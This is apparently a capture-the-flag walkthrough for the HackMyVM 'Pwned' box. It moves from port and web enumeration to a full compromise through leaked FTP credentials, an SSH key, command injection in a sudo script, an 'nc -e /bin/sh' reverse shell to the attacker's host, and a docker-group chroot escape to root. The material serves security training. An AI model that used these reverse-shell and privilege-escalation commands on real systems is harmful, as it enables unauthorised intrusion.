Overview
| Box Difficulty | Link |
|---|---|
| Easy | hackmyvm Link |
Found this new site for vulnerable machines. For this box I downloaded it off hackmyvm and gave it a spin.
It’s been long, but i’m treating this a as a practice session to warm my hands up.
Recon
Objective : Find out all the open ports and do a nmap service scan. I recently found out about rustscan and decided to give it a try.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# rustscan -a 192.168.56.19
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.19:21
Open 192.168.56.19:22
Open 192.168.56.19:80
We can see that there’s 3 open port. Port 21,22 and 80.
nmap output shows the below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# nmap -sV -sC -p 21,22,80 192.168.56.19 -o nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 05:18 EST
Nmap scan report for 192.168.56.19
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A1:7E:A2 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
Let’s enumerate!
FTP- TCP 21
vsFTPd version 3.0.3 based off banner grabbing, however nothing to work on here.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# ftp 192.168.56.19
Connected to 192.168.56.19.
220 (vsFTPd 3.0.3)
Name (192.168.56.19:kali):
530 Permission denied.
ftp: Login failed
ftp> exit
221 Goodbye.
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# searchsploit vsftpd
---------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
---------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
HTTP- TCP 80
Looing through nikto output we can see that there’s a robot.txt file which contain/nothing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# nikto -ask=no -h 192.168.56.19:80 2>&1 | tee nikto_P80.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.19
+ Target Hostname: 192.168.56.19
+ Target Port: 80
+ Start Time: 2021-12-22 05:18:51 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /nothing/: Directory indexing found.
+ Entry '/nothing/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: bf9, size: 5a9c7ca4a3440, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2021-12-22 05:19:09 (GMT-5) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Further enumeration leads to another dead end:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# curl 192.168.56.19/nothing/nothing.html
<!DOCTYPE html>
<html>
<head>
<title>Nothing</title>
</head>
<body>
<h1>i said nothing bro </h1>
<p></p>
<!--I said nothing here. you are wasting your time i don't lie-->
</body>
Gobuster output has an intersting folder called /hidden_text
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# gobuster dir -u http://192.168.56.19:80 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,php.bak,bak,jsp " -o gobuster_p80.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.19:80
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: bak,jsp,txt,html,php,php.bak
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/12/22 05:20:37 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.56.19:80/index.html (Status: 200) [Size: 3065]
http://192.168.56.19:80/robots.txt (Status: 200) [Size: 41]
http://192.168.56.19:80/nothing (Status: 301) [Size: 316] [--> http://192.168.56.19/nothing/]
http://192.168.56.19:80/server-status (Status: 403) [Size: 278]
http://192.168.56.19:80/hidden_text (Status: 301) [Size: 320] [--> http://192.168.56.19/hidden_text/]
===============================================================
2021/12/22 05:23:32 Finished
===============================================================
We can see that there’s a dictionary for us called secret.dic. Let’s save the file and use gobuster again to see what we can find. 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
└─# curl http://192.168.56.19/hidden_text/secret.dic >> files.txt
/hacked
/vanakam_nanba
/hackerman.gif
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# cat files.txt
hacked
vanakam_nanba
hackerman.gif
facebook
whatsapp
instagram
pwned
pwned.com
pubg
cod
fortnite
youtube
kali.org
hacked.vuln
users.vuln
passwd.vuln
pwned.vuln
backup.vuln
.ssh
root
home
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# gobuster dir -u http://192.168.56.19:80 -w files.txt -t 100 -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,php.bak,bak,jsp "
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.19:80
[+] Method: GET
[+] Threads: 100
[+] Wordlist: files.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: bak,jsp,txt,html,php,php.bak
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/12/22 05:27:41 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.56.19:80/pwned.vuln (Status: 301) [Size: 319] [--> http://192.168.56.19/pwned.vuln/]
===============================================================
2021/12/22 05:27:41 Finished
===============================================================
Further enumeration shows the username and password! Great ! Looks like we can reuse the password for the FTP.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# curl http://192.168.56.19/pwned.vuln/
<!DOCTYPE html>
<html>
<head>
<title>login</title>
</head>
<body>
<div id="main">
<h1> vanakam nanba. I hacked your login page too with advanced hacking method</h1>
<form method="POST">
Username <input type="text" name="username" class="text" autocomplete="off" required>
Password <input type="password" name="password" class="text" required>
<input type="submit" name="submit" id="sub">
</form>
</div>
</body>
</html>
<?php
// if (isset($_POST['submit'])) {
// $un=$_POST['username'];
// $pw=$_POST['password'];
//
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
// echo "welcome"
// exit();
// }
// else
// echo "Invalid creds"
// }
?>
Shell as ariana
Enumerating FTP for files and folder. We can find id_rsa used for SSH and also a note which is specified for ariana.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# ftp 192.168.56.19
Connected to 192.168.56.19.
220 (vsFTPd 3.0.3)
Name (192.168.56.19:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47890|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK
ftp> cd share
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39232|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||13929|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |*****************************************************************************************************************************| 2602 5.35 MiB/s 00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (3.12 MiB/s)
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||46351|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |*****************************************************************************************************************************| 75 170.72 KiB/s 00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (97.78 KiB/s)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# cat note.txt
Wow you are here
ariana won't happy about this note
sorry ariana :(
──(root💀kali)-[/opt/hackmyv/pwned]
└─# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAthncqHSPVcE7xs136G/G7duiV6wULU+1Y906aF3ltGpht/sXByPB
aEzxOfqRXlQfkk7hpSYk8FCAibxddTGkd5YpcSH7U145sc2n7jwv0swjMu1ml+B5Vra7JJ
Let’s SSH into the server as ariana.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
──(root💀kali)-[/opt/hackmyv/pwned]
└─# ssh ariana@192.168.56.19 -i id_rsa
The authenticity of host '192.168.56.19 (192.168.56.19)' can't be established.
ED25519 key fingerprint is SHA256:Eu7UdscPxuaxyzophLkeILniUaKCge0R96HjWhAmpyk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.19' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
ariana@192.168.56.19's password:
Look’s like the permissions are too open.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
──(root💀kali)-[/opt/hackmyv/pwned]
└─# chmod 600 id_rsa
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# ssh ariana@192.168.56.19 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$ whoami
ariana
Awesome, we got in!
Shell as selena
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
In this case we can see /home/messenger.sh is able to be executed without password as selena. Looking through the file, it is a simple bash script which we can execute a linux command as selena because of $msg 2> /dev/null which takes in our input.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh
ariana@pwned:/home$ ls -la /home/messenger.sh
-rwxr-xr-x 1 root root 367 Jul 10 2020 /home/messenger.sh
ariana@pwned:/home$ cat messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
Let’s test to see if what we thought is true
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
ariana@pwned:/home$ sudo -u selena /home/messenger.sh
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : test
Enter message for test :ls -la
Sending message to test
total 24
drwxr-xr-x 5 root root 4096 Jul 10 2020 .
drwxr-xr-x 18 root root 4096 Jul 6 2020 ..
drwxrwx--- 4 ariana ariana 4096 Jul 10 2020 ariana
drwxrwxrwx 3 root root 4096 Jul 9 2020 ftpuser
-rwxr-xr-x 1 root root 367 Jul 10 2020 messenger.sh
drwxrwx--- 3 selena root 4096 Jul 10 2020 selena
Message sent to test :)
Great, we can see that the command ls-la is executed. Let’s run a nc command to get back a reverse shell as selena.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
ariana@pwned:~$
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : test
Enter message for test :nc -e /bin/sh 192.168.56.3 4242
Sending message to test
Catch the reverse shell:
1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.19]
whoami
selena
python3 -c 'import pty; pty.spawn("/bin/sh")'
$ whoami
whoami
selena
We are now selena!
Shell as Root
This time I’ll use linpeas to enumrate.
1
2
3
4
5
6
7
8
9
10
11
12
13
$ cd /tmp
cd /tmp
$ wget http://192.168.56.3:1235/linpeas.sh
wget http://192.168.56.3:1235/linpeas.sh
--2021-12-23 20:25:04-- http://192.168.56.3:1235/linpeas.sh
Connecting to 192.168.56.3:1235... connected.
HTTP request sent, awaiting response... 200 OK
Length: 330173 (322K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 322.43K --.-KB/s in 0.004s
2021-12-23 20:25:04 (89.7 MB/s) - ‘linpeas.sh’ saved [330173/330173]
After running linpeas, this stick out to me.
1
2
3
4
5
6
$ bash linpeas.sh
bash linpeas.sh
........
[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
We are in a docker group! If you are inside a docker container or you have access to a user in the docker group, you could try to escape and escalate privileges:
Sample command
1
2
3
4
#List images to use one
docker images
#Run the image mounting the host disk and chroot on it
docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash
So in turn it’ll be like this:
1
2
3
4
5
6
7
8
9
10
11
12
$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
privesc latest 09ae39f0f8fc 17 months ago 88.3MB
<none> <none> e13ad046d435 17 months ago 88.3MB
alpine latest a24bb4013296 19 months ago 5.57MB
debian wheezy 10fcec6d95c4 2 years ago 88.3MB
$ docker run -it -v /:/host/ privesc chroot /host/ bash
root@445c9d840e51:~# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Rooted!